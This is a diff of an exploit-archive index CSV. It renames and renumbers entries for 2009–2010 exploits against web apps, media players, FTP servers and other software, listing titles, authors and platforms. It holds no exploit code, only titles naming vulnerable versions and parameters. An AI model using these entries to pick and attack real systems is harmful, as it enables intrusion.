9069,platforms/php/webapps/9069.txt,"cms chainuk <= 1.2 - Multiple Vulnerabilities",2009-07-01,eLwaux,php,webapps,0 9070,platforms/windows/local/9070.pl,"AudioPLUS 2.00.215 - (.pls) Local Buffer Overflow Exploit (SEH)",2009-07-01,Stack,windows,local,0 9071,platforms/multiple/dos/9071.txt,"Apple Safari 4.x JavaScript Reload Remote Crash Exploit",2009-07-02,SkyOut,multiple,dos,0 -9072,platforms/multiple/local/9072.txt,"Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit",2009-07-02,"Sumit Siddharth",multiple,local,0 +9072,platforms/multiple/local/9072.txt,"Oracle 10g - SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit (2)",2009-07-02,"Sumit Siddharth",multiple,local,0 9073,platforms/php/webapps/9073.php,"YourTube <= 2.0 - Arbitrary Database Disclosure Exploit",2009-07-02,"Security Code Team",php,webapps,0 9074,platforms/cgi/webapps/9074.txt,"Sourcefire 3D Sensor & Defense Center 4.8.x - Privilege Escalation Vulnerability",2009-07-02,"Gregory Duchemin",cgi,webapps,0 9075,platforms/php/webapps/9075.txt,"AdminLog 0.5 (valid_login) Authentication Bypass Vulnerability",2009-07-02,SirGod,php,webapps,0 @@ -8617,7 +8617,7 @@ id,file,description,date,author,platform,type,port 9134,platforms/freebsd/dos/9134.c,"FreeBSD 6/8 - (ata device) Local Denial of Service Exploit",2009-07-13,"Shaun Colley",freebsd,dos,0 9135,platforms/linux/local/9135.sh,"Openswan <= 2.4.12/2.6.16 Insecure Temp File Creation Root Exploit",2009-07-13,nofame,linux,local,0 9136,platforms/windows/local/9136.pl,"Mp3-Nator 2.0 (ListData.dat) Universal Buffer Overflow Exploit (SEH)",2009-07-13,"ThE g0bL!N",windows,local,0 -9137,platforms/windows/remote/9137.html,"Mozilla Firefox 3.5 (Font tags) Remote Buffer Overflow Exploit",2009-07-13,Sberry,windows,remote,0 +9137,platforms/windows/remote/9137.html,"Mozilla Firefox 3.5 - (Font tags) Remote Buffer Overflow Exploit",2009-07-13,Sberry,windows,remote,0 9138,platforms/php/webapps/9138.txt,"onepound shop 1.x products.php SQL Injection Vulnerability",2009-07-13,Affix,php,webapps,0 9139,platforms/windows/remote/9139.pl,"JetAudio 7.5.3 COWON Media Center - (.wav) Crash Exploit",2009-07-14,prodigy,windows,remote,0 9140,platforms/cgi/webapps/9140.txt,"DJ Calendar - (DJcalendar.cgi TEMPLATE) File Disclosure Vulnerability",2009-07-14,cibbao,cgi,webapps,0 @@ -8726,7 +8726,7 @@ id,file,description,date,author,platform,type,port 9251,platforms/php/webapps/9251.txt,"Deonixscripts Templates Management 1.3 - SQL Injection Vulnerability",2009-07-24,d3b4g,php,webapps,0 9252,platforms/php/webapps/9252.txt,"Scripteen Free Image Hosting Script 2.3 - SQL Injection Exploit",2009-07-24,Coksnuss,php,webapps,0 9253,platforms/windows/dos/9253.html,"Microsoft Internet Explorer 7/8 findText Unicode Parsing Crash Exploit",2009-07-24,Hong10,windows,dos,0 -9254,platforms/php/webapps/9254.txt,"PHP Live! <= 3.2.2 (questid) Remote SQL Injection Vulnerability",2009-07-24,skys,php,webapps,0 +9254,platforms/php/webapps/9254.txt,"PHP Live! <= 3.2.2 - (questid) Remote SQL Injection Vulnerability (2)",2009-07-24,skys,php,webapps,0 9255,platforms/php/webapps/9255.txt,"Clip Bucket <= 1.7.1 Insecure Cookie Handling Vulnerability",2009-07-24,Qabandi,php,webapps,0 9256,platforms/php/webapps/9256.txt,"Scripteen Free Image Hosting Script 2.3 - Insecure Cookie Handling Vulnerability",2009-07-24,Qabandi,php,webapps,0 9257,platforms/php/webapps/9257.php,"Pixaria Gallery 2.3.5 (file) Remote File Disclosure Exploit",2009-07-24,Qabandi,php,webapps,0 @@ -8974,7 +8974,7 @@ id,file,description,date,author,platform,type,port 9508,platforms/windows/remote/9508.rb,"ProFTP 2.9 (welcome message) Remote Buffer Overflow Exploit (Metasploit)",2009-08-25,His0k4,windows,remote,0 9509,platforms/windows/local/9509.pl,"Media Jukebox 8 - (.M3U) Universal Local Buffer Exploit (SEH)",2009-08-25,hack4love,windows,local,0 9510,platforms/php/webapps/9510.txt,"Joomla Component com_siirler 1.2 (sid) SQL Injection Vulnerability",2009-08-25,v3n0m,php,webapps,0 -9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script (id) Remote SQL Injection Vulnerability",2009-08-25,Red-D3v1L,php,webapps,0 +9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script - (id) Remote SQL Injection Vulnerability (2)",2009-08-25,Red-D3v1L,php,webapps,0 9512,platforms/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass Vulnerabilities",2009-08-25,Securitylab.ir,php,webapps,0 9513,platforms/linux/local/9513.c,"Linux Kernel <= 2.6.31-rc7 - AF_LLC getsockname 5-Byte Stack Disclosure Proof of Concept",2009-08-25,"Jon Oberheide",linux,local,0 9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre Multiple Models Denial of Service Exploit",2009-08-25,"Henri Lindberg",hardware,dos,0 @@ -9027,7 +9027,7 @@ id,file,description,date,author,platform,type,port 9564,platforms/php/webapps/9564.txt,"Joomla Component Agora 3.0.0b (com_agora) LFI Vulnerability",2009-09-01,ByALBAYX,php,webapps,0 9565,platforms/php/webapps/9565.txt,"Xstate Real Estate 1.0 (bSQL/XSS) Multiples Vulnerabilities",2009-09-01,Moudi,php,webapps,0 9566,platforms/php/webapps/9566.txt,"Kingcms 0.6.0 (menu.php) Remote File Inclusion Vulnerability",2009-09-01,CoBRa_21,php,webapps,0 -9567,platforms/windows/local/9567.pl,"Hamster Audio Player 0.3a (Associations.cfg) Local Buffer Exploit (SEH)",2009-09-01,"ThE g0bL!N",windows,local,0 +9567,platforms/windows/local/9567.pl,"Hamster Audio Player 0.3a - (Associations.cfg) Local Buffer Exploit (SEH) (1)",2009-09-01,"ThE g0bL!N",windows,local,0 9568,platforms/windows/local/9568.py,"akPlayer 1.9.0 - (.plt) Universal Buffer Overflow Exploit (SEH)",2009-09-01,TiGeR-Dz,windows,local,0 9569,platforms/php/webapps/9569.txt,"phpBB3 addon prime_quick_style GetAdmin Vulnerability",2009-09-01,-SmoG-,php,webapps,0 9570,platforms/php/webapps/9570.txt,"Ve-EDIT 0.1.4 (debug_php.php) Local File Inclusion Vulnerability",2009-09-01,CoBRa_21,php,webapps,0 @@ -9040,7 +9040,7 @@ id,file,description,date,author,platform,type,port 9577,platforms/php/webapps/9577.txt,"Ve-EDIT 0.1.4 (highlighter) Remote File Inclusion Vulnerability",2009-09-02,RoMaNcYxHaCkEr,php,webapps,0 9578,platforms/php/webapps/9578.txt,"PHP Live! 3.3 (deptid) Remote SQL Injection Vulnerability",2009-09-02,v3n0m,php,webapps,0 9579,platforms/windows/local/9579.txt,"Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 - Collab getIcon Universal Exploit",2009-09-03,kralor,windows,local,0 -9580,platforms/windows/local/9580.pl,"Hamster Audio Player 0.3a (Associations.cfg) Local Buffer Exploit (SEH)",2009-09-03,hack4love,windows,local,0 +9580,platforms/windows/local/9580.pl,"Hamster Audio Player 0.3a - (Associations.cfg) Local Buffer Exploit (SEH) (2)",2009-09-03,hack4love,windows,local,0 9581,platforms/windows/local/9581.pl,"SAP Player 0.9 - (.m3u) Universal Local BoF Exploit (SEH)",2009-09-03,PLATEN,windows,local,0 9582,platforms/php/webapps/9582.txt,"FreeSchool <= 1.1.0 - Multiple Remote File Inclusion Vulnerabilities",2009-09-03,"cr4wl3r ",php,webapps,0 9583,platforms/php/webapps/9583.txt,"PHPope <= 1.0.0 - Multiple Remote File Inclusion Vulnerabilities",2009-09-03,"cr4wl3r ",php,webapps,0 @@ -9277,7 +9277,7 @@ id,file,description,date,author,platform,type,port 9894,platforms/windows/local/9894.txt,"Millenium MP3 Studio 2.0 - (m3u) BoF",2009-10-15,dellnull,windows,local,0 9895,platforms/windows/local/9895.txt,"Millenium MP3 Studio 2.0 - (mpf) BoF",2009-10-14,dellnull,windows,local,0 9896,platforms/windows/remote/9896.txt,"MiniShare HTTP 1.5.5 - Remote Buffer Overflow Exploit",2009-10-19,iM4n,windows,remote,80 -9897,platforms/php/webapps/9897.txt,"Mongoose Web Server 2.8.0 Source Disclosure",2009-10-23,Dr_IDE,php,webapps,0 +9897,platforms/php/webapps/9897.txt,"Mongoose Web Server 2.8.0 - Source Disclosure",2009-10-23,Dr_IDE,php,webapps,0 9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 Root folder disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0 9900,platforms/windows/remote/9900.txt,"NaviCOPA <= 3.0.1.2 Source Disclosure",2009-10-14,Dr_IDE,windows,remote,0 9901,platforms/linux/dos/9901.txt,"nginx 0.7.0 - 0.7.61 / 0.6.0 - 0.6.38 / 0.5.0 - 0.5.37 / 0.4.0 - 0.4.14 - PoC",2009-10-23,"Zeus Penguin",linux,dos,80 @@ -9285,9 +9285,9 @@ id,file,description,date,author,platform,type,port 9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 - XSS & SQL injection",2009-10-20,"Amol Naik",php,webapps,0 9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection Vulnerability",2009-10-30,"Securitylab Research",asp,webapps,0 9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 <= 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow Vulnerability",2009-10-30,"Dennis Yurichev",windows,remote,1521 -9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 Cache Lite Output Remote File Inclusion",2008-06-14,MC,php,webapps,0 +9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 - Cache Lite Output Remote File Inclusion",2008-06-14,MC,php,webapps,0 9907,platforms/cgi/webapps/9907.rb,"The Matt Wright guestbook.pl <= 2.3.1 - Server Side Include Vulnerability",1999-11-05,patrick,cgi,webapps,0 -9908,platforms/php/webapps/9908.rb,"BASE <= 1.2.4 base_qry_common.php Remote File Inclusion",2008-06-14,MC,php,webapps,0 +9908,platforms/php/webapps/9908.rb,"BASE <= 1.2.4 - base_qry_common.php Remote File Inclusion",2008-06-14,MC,php,webapps,0 9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4-6.5 - AllowToUpdateStatsFromBrowser Command Injection",2006-05-04,patrick,cgi,webapps,0 9911,platforms/php/webapps/9911.rb,"Cacti 0.8.6-d graph_view.php Command Injection",2005-01-15,"David Maciejak",php,webapps,0 9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2-6.1 - configdir Command Injection",2005-01-15,"Matteo Cantoni",cgi,webapps,0 @@ -9349,7 +9349,7 @@ id,file,description,date,author,platform,type,port 33433,platforms/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0 33434,platforms/windows/webapps/33434.rb,"HP Release Control Authenticated XXE",2014-05-19,"Brandon Perry",windows,webapps,80 9973,platforms/multiple/local/9973.sh,"Sun VirtualBox <= 3.0.6 - Privilege Escalation",2009-10-17,prdelka,multiple,local,0 -9974,platforms/windows/local/9974.pl,"AIMP2 Audio Converter Playlist (SEH)",2009-11-16,corelanc0d3r,windows,local,0 +9974,platforms/windows/local/9974.pl,"AIMP2 Audio Converter - Playlist (SEH)",2009-11-16,corelanc0d3r,windows,local,0 9975,platforms/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - (XSS and CSR) Multiple Vulnerabilities",2009-11-16,"Alexey Sintsov",hardware,webapps,80 9978,platforms/php/webapps/9978.txt,"TwonkyMedia Server <= 4.4.17 & <= 5.0.65 - XSS",2009-10-23,"Davide Canali",php,webapps,0 9979,platforms/php/webapps/9979.txt,"Vivvo CMS 4.1.5.1 file disclosure",2009-10-22,"Janek Vind",php,webapps,0 @@ -9369,7 +9369,7 @@ id,file,description,date,author,platform,type,port 9995,platforms/multiple/remote/9995.txt,"Apache Tomcat Form Authentication Username Enumeration Weakness",2009-11-09,"D. Matscheko",multiple,remote,0 9996,platforms/php/webapps/9996.txt,"Article Directory Index.php Remote File Include Vulnerability",2009-11-12,mozi,php,webapps,0 9997,platforms/multiple/remote/9997.txt,"Blender 2.49b - (.blend) Remote Command Execution Vulnerability",2009-11-09,"Fernando Russ",multiple,remote,0 -9998,platforms/windows/remote/9998.c,"BulletProof FTP 2.63 b56 Client Malformed '.bps' File Stack Buffer Overflow",2009-10-07,"Rafa De Sousa",windows,remote,21 +9998,platforms/windows/remote/9998.c,"BulletProof FTP 2.63 b56 - Client Malformed '.bps' File Stack Buffer Overflow",2009-10-07,"Rafa De Sousa",windows,remote,21 9999,platforms/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 Pre-Auth DoS",2009-09-30,"Francis Provencher",windows,dos,21 10000,platforms/hardware/remote/10000.txt,"Cisco ACE XML Gateway <= 6.0 Internal IP disclosure",2009-09-25,nitr0us,hardware,remote,0 10001,platforms/multiple/remote/10001.txt,"CUPS 'kerberos' Parameter Cross-Site Scripting Vulnerability",2009-11-11,"Aaron Sigel",multiple,remote,80 @@ -9433,13 +9433,13 @@ id,file,description,date,author,platform,type,port 10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution",2009-11-12,"H D Moore",windows,dos,0 10069,platforms/php/webapps/10069.php,"Empire CMS 47 SQL Injection",2009-10-05,"Securitylab Security Research",php,webapps,0 10070,platforms/windows/remote/10070.php,"IBM Informix Client SDK 3.0 nfx file integer Overflow Exploit",2009-10-05,bruiser,windows,remote,0 -10071,platforms/multiple/remote/10071.txt,"Mozilla NSS NULL Character CA SSL Certificate Validation Security Bypass Vulnerability",2009-11-10,"Dan Kaminsky",multiple,remote,0 +10071,platforms/multiple/remote/10071.txt,"Mozilla NSS - NULL Character CA SSL Certificate Validation Security Bypass Vulnerability",2009-11-10,"Dan Kaminsky",multiple,remote,0 10072,platforms/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security Vulnerability",2009-11-12,"Marsh Ray",multiple,local,0 10073,platforms/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - DoS",2009-10-02,PLATEN,windows,dos,21 10074,platforms/novell/webapps/10074.txt,"Novell eDirectory 8.8 SP5 - 'dconserv.dlm' Cross-Site Scripting",2009-10-01,"Francis Provencher",novell,webapps,8030 10075,platforms/novell/webapps/10075.txt,"Novell Edirectory 8.8 SP5 - XSS",2009-09-23,"Francis Provencher",novell,webapps,8030 10076,platforms/osx/local/10076.c,"VMWare Fusion <= 2.0.5 - vmx86 kext Kernel Local Root Exploit",2009-10-02,mu-b,osx,local,0 -10077,platforms/multiple/dos/10077.txt,"OpenLDAP 2.3.39 MODRDN Remote Denial of Service Vulnerability",2009-11-09,"Ralf Haferkamp",multiple,dos,389 +10077,platforms/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service Vulnerability",2009-11-09,"Ralf Haferkamp",multiple,dos,389 10078,platforms/osx/local/10078.c,"VMWare Fusion <= 2.0.5 vmx86 kext Local PoC",2009-10-02,mu-b,osx,local,0 10079,platforms/windows/remote/10079.txt,"Google Apps mailto uri handler cross-browser Remote command execution",2009-10-01,pyrokinesis,windows,remote,0 33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow",2014-05-19,"Mike Czumak",windows,local,0 @@ -9473,7 +9473,6 @@ id,file,description,date,author,platform,type,port 10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' and 'DELE' Command DoS",2009-11-13,zhangmc,windows,dos,21 10105,platforms/php/webapps/10105.txt,"Cifshanghai (chanpin_info.php) CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0 10106,platforms/windows/dos/10106.c,"Avast 4.8.1351.0 Antivirus - aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0 -10107,platforms/windows/local/10107.pl,"Icarus 2.0 - (.pgn) Universal Local Buffer Overflow Exploit (SEH)",2009-11-17,"D3V!L FUCK3R",windows,local,0 10160,platforms/windows/dos/10160.py,"FtpXQ 3.0 - Authenticated Remote DoS",2009-11-17,"Marc Doudiet",windows,dos,21 10161,platforms/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration panel Bypass and File Upload Vulnerability",2009-11-17,blackenedsecurity,asp,webapps,0 10162,platforms/windows/remote/10162.py,"Home FTP Server 'MKD' Command Directory Traversal Vulnerability",2009-11-17,zhangmc,windows,remote,21 @@ -9572,7 +9571,7 @@ id,file,description,date,author,platform,type,port 10275,platforms/php/webapps/10275.txt,"Kide Shoutbox 0.4.6 - XSS & AXFR",2009-12-02,andresg888,php,webapps,0 10276,platforms/hardware/webapps/10276.txt,"Huawei MT882 Modem/Router - Multiple Vulnerabilities",2009-12-03,DecodeX01,hardware,webapps,0 10277,platforms/php/webapps/10277.txt,"Thatware <= 0.5.3 - Multiple Remote File Include Exploit",2009-12-03,"cr4wl3r ",php,webapps,0 -10280,platforms/windows/local/10280.py,"AIMP2 Audio Converter <= 2.53 build 330 Playlist (.pls) Unicode BOF",2009-11-21,mr_me,windows,local,0 +10280,platforms/windows/local/10280.py,"AIMP2 Audio Converter <= 2.53 build 330 - Playlist (.pls) Unicode BOF",2009-11-21,mr_me,windows,local,0 10281,platforms/windows/local/10281.php,"Adobe Illustrator CS4 14.0.0 - Encapsulated Postscript (.eps) Buffer Overflow Exploit",2009-12-03,pyrokinesis,windows,local,0 10282,platforms/linux/remote/10282.py,"OrzHTTPd Format String Exploit",2009-12-03,"Patroklos Argyroudis",linux,remote,80 10284,platforms/php/webapps/10284.txt,"ita-forum 5.1.32 SQL Injection",2009-11-30,BAYBORA,php,webapps,0 @@ -9604,7 +9603,7 @@ id,file,description,date,author,platform,type,port 10319,platforms/windows/local/10319.py,"IDEAL Administration 2009 9.7 - Local Buffer Overflow Exploit",2009-12-05,Dr_IDE,windows,local,0 10320,platforms/windows/local/10320.py,"M3U To ASX-WPL 1.1 (m3u Playlist file) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 10321,platforms/windows/local/10321.py,"HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 -10322,platforms/windows/local/10322.py,"Audacity 1.2.6 (gro File) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 +10322,platforms/windows/local/10322.py,"Audacity 1.2.6 - (gro File) Buffer Overflow Exploit",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 10323,platforms/windows/local/10323.py,"HTML Help Workshop 4.74 - (hhp) Buffer Overflow Exploit (Universal)",2009-12-05,Dz_attacker,windows,local,0 10324,platforms/php/webapps/10324.txt,"phpshop 0.8.1 - Multiple Vulnerabilities",2009-12-05,"Andrea Fabrizi",php,webapps,0 10325,platforms/php/webapps/10325.txt,"WordPress Image Manager Plugins - Shell Upload Vulnerability",2009-12-05,DigitALL,php,webapps,0 @@ -9631,7 +9630,7 @@ id,file,description,date,author,platform,type,port 10350,platforms/php/webapps/10350.txt,"IRAN N.E.T E-commerce Group SQL Injection Vulnerability",2009-12-08,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10351,platforms/php/webapps/10351.txt,"MarieCMS 0.9 - LFI / RFI / XSS Vulnerabilities",2009-12-07,"Amol Naik",php,webapps,0 10352,platforms/hardware/dos/10352.txt,"TANDBERG F8.2 / F8.0 / F7.2 / F6.3 - Remote Denial of Service",2009-12-06,otokoyama,hardware,dos,0 -10353,platforms/windows/local/10353.pl,"Audio Workstation(.pls) Local Buffer Overflow Exploit (SEH)",2009-09-24,germaya_x,windows,local,0 +10353,platforms/windows/local/10353.pl,"Audio Workstation - (.pls) Local Buffer Overflow Exploit (SEH)",2009-09-24,germaya_x,windows,local,0 10354,platforms/php/webapps/10354.txt,"Viscacha 0.8 Gold persistant XSS Vulnerability",2009-12-08,mr_me,php,webapps,0 10356,platforms/php/webapps/10356.txt,"Joomla Component com_job (showMoreUse) SQL Injection Vulnerability",2009-12-08,Palyo34,php,webapps,0 10357,platforms/php/webapps/10357.txt,"Alqatari group 1.0 <= 5.0 - (id) Remote SQL Injection Vulnerability",2009-12-08,Red-D3v1L,php,webapps,0 @@ -9647,7 +9646,7 @@ id,file,description,date,author,platform,type,port 10368,platforms/asp/webapps/10368.txt,"Free ASP Upload Shell Upload Vulnerability",2009-12-10,Mr.aFiR,asp,webapps,0 10369,platforms/php/webapps/10369.txt,"Joomla! Mamboleto Component 2.0 RC3 - Remote File Include Vulneralbility",2009-12-10,"Don Tukulesto",php,webapps,0 10370,platforms/php/webapps/10370.txt,"PHP Inventory 1.2 - Remote (Auth Bypass) SQL Injection Vulnerabiity",2009-12-10,mr_me,php,webapps,0 -10371,platforms/windows/local/10371.pl,"Xenorate 2.50 - (.xpl) universal Local Buffer Overflow Exploit (SEH)",2009-12-10,germaya_x,windows,local,0 +10371,platforms/windows/local/10371.pl,"Xenorate 2.50 - (.xpl) universal Local Buffer Overflow Exploit (SEH) (1)",2009-12-10,germaya_x,windows,local,0 10372,platforms/aix/webapps/10372.txt,"OPMANAGER - Blind SQL/XPath injectio",2009-12-10,"Asheesh kumar Mani Tripathi",aix,webapps,0 10373,platforms/windows/local/10373.rb,"Xenorate 2.50 - (.xpl) universal Local Buffer Overflow Exploit (SEH) (Metasploit)",2009-12-10,"loneferret germaya_x",windows,local,0 10374,platforms/windows/local/10374.pl,"Easy RM to MP3 Converter 2.7.3.700",2009-12-10,"Vinod Sharma",windows,local,0 @@ -9698,7 +9697,7 @@ id,file,description,date,author,platform,type,port 10431,platforms/multiple/webapps/10431.txt,"Zabbix Agent < 1.6.7 - Remote Bypass Vulnerability",2009-12-14,Nicob,multiple,webapps,80 10432,platforms/multiple/webapps/10432.txt,"zabbix server - Multiple Vulnerabilities",2009-12-14,Nicob,multiple,webapps,80 10433,platforms/linux/webapps/10433.txt,"Mail Manager Pro - CSRF (Change Admin Password)",2009-12-14,"Milos Zivanovic ",linux,webapps,80 -10434,platforms/windows/remote/10434.py,"Savant Web Server 3.1 - Remote Buffer Overflow Exploit",2009-12-14,DouBle_Zer0,windows,remote,80 +10434,platforms/windows/remote/10434.py,"Savant Web Server 3.1 - Remote Buffer Overflow Exploit (3)",2009-12-14,DouBle_Zer0,windows,remote,80 10436,platforms/php/webapps/10436.txt,"Link Up Gold CSRF - Create Administrator Account",2009-12-14,bi0,php,webapps,0 10437,platforms/php/webapps/10437.txt,"Smart PHP Subscriber Multiple Disclosure Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0 10438,platforms/php/webapps/10438.txt,"AdManagerPro CSRF Create Administrator Account",2009-12-14,bi0,php,webapps,0 @@ -9778,13 +9777,13 @@ id,file,description,date,author,platform,type,port 10528,platforms/php/webapps/10528.txt,"V.H.S. Booking (hotel_habitaciones.php HotelID) Remote SQL Injection Vulnerability",2009-12-17,R3d-D3V!L,php,webapps,0 10529,platforms/asp/webapps/10529.txt,"eWebquiz 8 - Blind SQL Injection Vulnerability",2009-12-17,R3d-D3V!L,asp,webapps,0 10531,platforms/php/webapps/10531.txt,"jCore CMS Cross-Site Scripting Vulnerability",2009-12-17,loneferret,php,webapps,0 -10532,platforms/php/webapps/10532.txt,"Piwik Open Flash Chart Remote Code Execution Vulnerability",2009-12-17,"Braeden Thomas",php,webapps,0 +10532,platforms/php/webapps/10532.txt,"Piwik Open Flash Chart - Remote Code Execution Vulnerability",2009-12-17,"Braeden Thomas",php,webapps,0 10533,platforms/php/webapps/10533.txt,"VirtueMart 'product_id' Parameter SQL Injection Vulnerability",2009-12-17,Neo-GabrieL,php,webapps,0 10534,platforms/php/webapps/10534.txt,"Rumba XML suffers from a Cross-Site scripting Vulnerability",2009-12-17,"Hadi Kiamarsi",php,webapps,0 10535,platforms/php/webapps/10535.txt,"WordPress and Pyrmont 2.x - SQL Injection Vulnerability",2009-12-18,Gamoscu,php,webapps,0 10537,platforms/php/webapps/10537.txt,"gpEasy <= 1.5RC3 - Remote FIle Include Exploit",2009-12-18,"cr4wl3r ",php,webapps,0 10540,platforms/asp/webapps/10540.txt,"E-Smartcart Remote SQL Injection Vulnerability",2009-12-18,R3d-D3V!L,asp,webapps,0 -10542,platforms/windows/remote/10542.py,"TFTP Server for Windows 1.4 - Buffer Overflow Remote Exploit (2)",2009-12-18,Molotov,windows,remote,69 +10542,platforms/windows/remote/10542.py,"TFTP Server 1.4 - Buffer Overflow Remote Exploit (2)",2009-12-18,Molotov,windows,remote,69 10543,platforms/php/webapps/10543.txt,"Schweizer NISADA Communication CMS SQL Injection Vulnerability",2009-12-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10544,platforms/multiple/local/10544.html,"Mozilla Firefox Location Bar Spoofing Vulnerability",2009-12-18,"Jordi Chancel",multiple,local,0 10545,platforms/php/webapps/10545.txt,"Joomla Component com_jbook Blind SQL-injection",2009-12-18,FL0RiX,php,webapps,0 @@ -9959,9 +9958,9 @@ id,file,description,date,author,platform,type,port 10742,platforms/php/webapps/10742.txt,"Joomla Component com_dhforum SQL Injection Vulnerability",2009-12-27,"ViRuSMaN ",php,webapps,0 10743,platforms/php/webapps/10743.txt,"phPay 2.2a - Backup Vulnerability",2009-12-26,indoushka,php,webapps,0 10744,platforms/windows/local/10744.rb,"Media Jukebox 8.0.400 (seh) Buffer Overflow Exploit (Metasploit)",2009-12-27,dijital1,windows,local,0 -10745,platforms/windows/local/10745.c,"Mini-stream ripper 3.0.1.1 - (.pls) Local Universal Buffer Overflow Exploit",2009-12-27,mr_me,windows,local,0 -10747,platforms/windows/local/10747.py,"Mini-Stream Exploit for Windows XP SP2 and SP3",2009-12-27,dijital1,windows,local,0 -10748,platforms/windows/local/10748.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (Metasploit)",2009-12-27,dijital1,windows,local,0 +10745,platforms/windows/local/10745.c,"Mini-stream Ripper 3.0.1.1 - (.pls) Local Universal Buffer Overflow Exploit",2009-12-27,mr_me,windows,local,0 +10747,platforms/windows/local/10747.py,"Mini-Stream - (Windows XP SP2 and SP3) Exploit",2009-12-27,dijital1,windows,local,0 +10748,platforms/windows/local/10748.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (1)",2009-12-27,dijital1,windows,local,0 10750,platforms/php/webapps/10750.txt,"Mambo Component Material Suche 1.0 - SQL Injection",2009-12-27,Gamoscu,php,webapps,0 10751,platforms/php/webapps/10751.txt,"Koobi Pro 6.1 - Gallery (img_id)",2009-12-27,BILGE_KAGAN,php,webapps,0 10752,platforms/multiple/webapps/10752.txt,"Yonja Remote File Upload Vulnerability",2009-12-28,indoushka,multiple,webapps,80 @@ -10026,7 +10025,7 @@ id,file,description,date,author,platform,type,port 10824,platforms/php/webapps/10824.txt,"K-Rate SQL Injection Vulnerability",2009-12-30,e.wiZz,php,webapps,0 10825,platforms/php/dos/10825.sh,"WordPress <= 2.9 - DoS (0day)",2009-12-31,emgent,php,dos,80 10826,platforms/php/dos/10826.sh,"Drupal <= 6.16 / 5.21 - DoS (0day)",2009-12-31,emgent,php,dos,80 -10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 SEH Exploit",2009-12-30,"Sébastien Duquette",windows,local,0 +10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - SEH Exploit",2009-12-30,"Sébastien Duquette",windows,local,0 10828,platforms/php/webapps/10828.txt,"vBulletin ads_saed 1.5 (bnnr.php) SQL Injection Vulnerability",2009-12-30,"Hussin X",php,webapps,0 10829,platforms/php/dos/10829.pl,"vBulletin Denial of Service Vulnerability",2009-12-30,R3d-D3V!L,php,dos,0 10830,platforms/php/webapps/10830.txt,"Azadi Network (page) Remote SQL Injection Vulnerability",2009-12-30,"Hussin X",php,webapps,0 @@ -10180,7 +10179,7 @@ id,file,description,date,author,platform,type,port 11071,platforms/php/webapps/11071.txt,"DELTAScripts PHPClassifieds (rate.php) Blind SQL Injection",2010-01-08,"Hamza 'MizoZ' N.",php,webapps,0 11075,platforms/php/webapps/11075.txt,"ProfitCode Shopping Cart - Multiple LFI/RFI Vulnerabilities",2010-01-09,"Zer0 Thunder",php,webapps,0 11076,platforms/php/webapps/11076.txt,"PPVChat - Multiple Vulnerabilities",2010-01-09,andresg888,php,webapps,0 -11079,platforms/windows/local/11079.rb,"Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow",2010-01-10,"Sébastien Duquette",windows,local,0 +11079,platforms/windows/local/11079.rb,"Audiotran 1.4.1 - (Win XP SP2/SP3 English) Buffer Overflow",2010-01-10,"Sébastien Duquette",windows,local,0 11080,platforms/php/webapps/11080.txt,"ProArcadeScript to Game (game) SQL Injection Vulnerability",2010-01-10,Err0R,php,webapps,0 11081,platforms/php/webapps/11081.txt,"TermiSBloG 1.0 - SQL Injection(s) Vulnerability",2010-01-10,Cyber_945,php,webapps,0 11082,platforms/php/webapps/11082.txt,"PHPCalendars - Multiple Vulnerabilities",2010-01-10,LionTurk,php,webapps,0 @@ -10721,7 +10720,6 @@ id,file,description,date,author,platform,type,port 11727,platforms/php/webapps/11727.txt,"Front Door 0.4b - SQL Injection Vulnerability",2010-03-14,blake,php,webapps,0 11728,platforms/windows/dos/11728.pl,"Media Player 6.4.9.1 with K-Lite Codec Pack - DoS/Crash (.avi)",2010-03-14,En|gma7,windows,dos,0 11729,platforms/php/webapps/11729.txt,"DesktopOnNet 3 Beta9 - Local File Include Vulnerability",2010-03-14,"cr4wl3r ",php,webapps,0 